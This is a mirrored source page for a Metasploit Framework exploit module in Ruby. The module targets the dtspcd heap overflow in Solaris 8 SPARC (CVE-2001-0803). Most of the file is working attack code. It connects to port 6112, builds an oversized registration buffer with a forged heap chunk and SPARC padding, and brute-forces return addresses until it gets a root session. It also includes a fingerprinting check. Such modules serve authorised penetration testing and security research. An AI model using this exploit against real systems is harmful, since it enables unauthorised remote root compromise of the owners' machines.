Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/dtspcd/heap_noir.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  prepend Msf::Exploit::Remote::AutoCheck

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Solaris dtspcd Heap Overflow',

17
        'Description' => %q{

18
          This is a port of noir's dtspcd exploit. This module should

19
          work against any vulnerable version of Solaris 8 (sparc).

20
          The original exploit code was published in the book

21
          Shellcoder's Handbook.

22
        },

23
        'Author' => [ 'noir <noir[at]uberhax0r.net>', 'hdm' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          ['CVE', '2001-0803'],

27
          ['OSVDB', '4503'],

28
          ['BID', '3517'],

29
          ['URL', 'https://web.archive.org/web/20011116020106/http://www.cert.org/advisories/CA-2001-31.html'],

30
          ['URL', 'https://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],

31


32
        ],

33
        'Privileged' => true,

34
        'Payload' => {

35
          'Space' => 800,

36
          'BadChars' => "\x00\x0d",

37
          'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3)

38
        },

39
        'Platform' => 'solaris',

40
        'Arch' => ARCH_SPARC,

41
        'Targets' => [

42
          [

43
            'Solaris 8',

44
            {

45
              'Rets' => [

46
                0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ]

47
              ]

48
            }

49
          ],

50
        ],

51
        'DisclosureDate' => '2002-07-10',

52
        'DefaultTarget' => 0,

53
        'Notes' => {

54
          'SideEffects' => [ IOC_IN_LOGS ],

55
          'Reliability' => [ REPEATABLE_SESSION ],

56
          'Stability' => [ CRASH_SERVICE_RESTARTS ]

57
        }

58
      )

59
    )

60


61
    register_options([

62
      Opt::RPORT(6112)

63
    ])

64
  end

65


66
  def exploit

67
    target['Rets'][4].each do |tjmp|

68
      rbase = target['Rets'][1]

69


70
      while (rbase < target['Rets'][2])

71
        break if session_created?

72


73
        retloc = target['Rets'][0] + tjmp

74
        print_status(format('Trying 0x%<retloc>.8x 0x%<rbase>.8x...', retloc: retloc, rbase: rbase))

75


76
        begin

77
          attack(retloc, rbase, payload.encoded)

78
          break if session_created?

79


80
          attack(retloc, rbase + 4, payload.encoded)

81
          rbase += target['Rets'][3]

82
        rescue EOFError

83
          # This is expected

84
        end

85
      end

86
    end

87


88
    handler

89
    disconnect

90
  end

91


92
  def check

93
    spc_connect

94
    spc_write(spc_register('root', "\x00"), 4)

95
    host, os, ver, arch = spc_read.gsub("\x00", '').split(':')

96


97
    return CheckCode::Safe unless host

98


99
    spc_write('', 2)

100


101
    return CheckCode::Safe("Detected dtspcd running #{os} v#{ver} on #{arch} hardware. Target host architecture #{arch} is not sparc.") unless arch =~ /sparc/i

102


103
    CheckCode::Detected("Detected dtspcd running #{os} v#{ver} on #{arch} hardware.")

104
  end

105


106
  def chunk_create(retloc, retadd)

107
    "\x12\x12\x12\x12" +

108
      [retadd].pack('N') +

109
      "\x23\x23\x23\x23\xff\xff\xff\xff" \

110
      "\x34\x34\x34\x34\x45\x45\x45\x45" \

111
      "\x56\x56\x56\x56" +

112
      [retloc - 8].pack('N')

113
  end

114


115
  def attack(retloc, retadd, fcode)

116
    spc_connect

117


118
    buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - fcode.length) / 8))

119
    buf << fcode

120
    buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"

121
    buf << "\x12\x12\x12\x12\xff\xff\xff\xff"

122
    buf << "\x00\x00\x0f\xf4"

123
    buf << chunk_create(retloc, retadd)

124
    buf << 'X' * ((0x103e - 8) - buf.length)

125


126
    spc_write(spc_register('', buf), 4)

127


128
    handler

129
  rescue EOFError

130
    # This is expected

131
  end

132


133
  def spc_register(user = '', buff = '')

134
    "4 \x00#{user}\x00\x0010\x00#{buff}"

135
  end

136


137
  def spc_write(buff = '', cmd = '')

138
    data = format('%08x', 2)

139
    data << format('%02x', cmd)

140
    data << format('%04x', buff.length)

141
    data << format('%04x', (@spc_seq += 1))

142
    data << "  #{buff}"

143
    sock.put(data)

144
  end

145


146
  def spc_read

147
    # Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq

148
    head = sock.get_once(20)

149
    sock.get_once(head[10, 13].hex) || ''

150
  end

151


152
  def spc_connect

153
    disconnect

154
    connect

155
    @spc_seq = 0

156
  end

157
end

158


159